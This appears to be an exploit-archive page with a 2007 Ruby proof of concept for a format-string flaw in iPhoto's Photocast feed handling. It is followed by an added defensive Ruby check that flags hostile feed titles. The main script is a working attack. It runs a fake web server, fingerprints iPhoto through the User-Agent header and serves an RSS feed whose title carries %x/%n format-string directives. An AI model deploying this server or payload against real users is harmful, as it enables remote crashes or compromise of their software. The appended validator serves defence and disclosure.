iLife iPhoto Photocast (XML title) Remote Format String PoC
Source: lmh [at] info-pull.com   Author: LMH   Published: 2007-01-05

#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

# Photocast (RSS 2.0) feed whose channel <title> carries the format-string
# trigger: 256 filler bytes followed by %x/%n conversion directives.
IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
              "<rss version=\"2.0\" xmlns:aw=\"http://www.apple.com/ilife/wallpapers\">\r\n" +
              "<channel>\r\n" +
              "<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
              "<item>\r\n" +
              "<title>In Gruber We Trust</title>\r\n" +
              "<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
              "</aw:image>\r\n" +
              "</item>\r\n" +
              "</channel>\r\n" +
              "</rss>\r\n"

# Listening port, taken from the first argument (default 80).
web_port = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server = TCPServer.new(nil, web_port)   # nil host: bind to all interfaces
while (session = web_server.accept)
  # Read the request head and extract the User-Agent header.
  # .to_s keeps a request without that header from raising NoMethodError on nil.
  user_agent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].to_s.strip
  session.print "HTTP/1.1 200 OK\r\nServer: Unabomber/1.0\r\n"

  # Check if remote user-agent is iPhoto.
  if user_agent.scan(/iPhoto/).size < 1
    puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
    session.print "Content-type: text/plain\r\n\r\n"
    session.print "All your Aunt Sophia are belong to us."
  else
    # Version string following "iPhoto/" in the User-Agent, for the log line only.
    version = user_agent[/iPhoto\/(\S+)/, 1]
    puts "++ iPhoto #{version} user connected (#{session.peeraddr[3]}), " +
         "sending payload (#{IPHOTO_FEED.size} bytes)."
    session.print "Content-type: text/xml\r\n\r\n"
    session.print IPHOTO_FEED
  end

  session.close
end
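As an added defensive example (not part of the original PoC or of iPhoto), here is a Ruby check a feed consumer can run on a fetched photocast before any title text reaches a printf-style function: it rejects titles that contain conversion directives such as the %x/%n sequence above, and titles far longer than a real photocast name. The sample feeds and the 200-character threshold are constructed for this example.

```ruby
require 'rexml/document'

# A printf-style conversion directive (%x, %n, %08x, %.2f ...). No legitimate
# photocast title contains one, and it is the trigger for this class of bug.
FORMAT_DIRECTIVE = /%[-+#0]*\d*(?:\.\d+)?[hlLqjzt]*[diouxXeEfgGcspn]/
# Constructed threshold for this example: real photocast titles are short.
MAX_TITLE_LENGTH = 200

# Returns one finding per <title> element whose text should never reach a
# format function: which element holds it, its length, and why it was flagged.
def suspicious_titles(xml)
  doc = REXML::Document.new(xml)
  findings = []
  doc.elements.each('//title') do |el|
    text = el.text.to_s
    reasons = []
    reasons << 'format directive' if text.match?(FORMAT_DIRECTIVE)
    reasons << 'oversized' if text.length > MAX_TITLE_LENGTH
    findings << { parent: el.parent.name, length: text.length, reasons: reasons } unless reasons.empty?
  end
  findings
end

# Gate for a fetched feed; XML that does not parse is rejected as well.
def safe_feed?(xml)
  suspicious_titles(xml).empty?
rescue REXML::ParseException
  false
end

# Constructed sample feeds with the same shape as the PoC payload (not captured traffic).
BENIGN_FEED = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
    <channel>
      <title>Vacation photos</title>
      <item><title>Day one</title><aw:image>http://example.invalid/a.jpg</aw:image></item>
    </channel>
  </rss>
XML
HOSTILE_FEED = BENIGN_FEED.sub('Vacation photos', ('A' * 256) + '%x.%n.%n.%n.%n.%n')

if __FILE__ == $PROGRAM_NAME
  puts "benign feed safe?  #{safe_feed?(BENIGN_FEED)}"    # true
  puts "hostile feed safe? #{safe_feed?(HOSTILE_FEED)}"   # false
  suspicious_titles(HOSTILE_FEED).each { |f| puts "  #{f.inspect}" }
end
```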
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved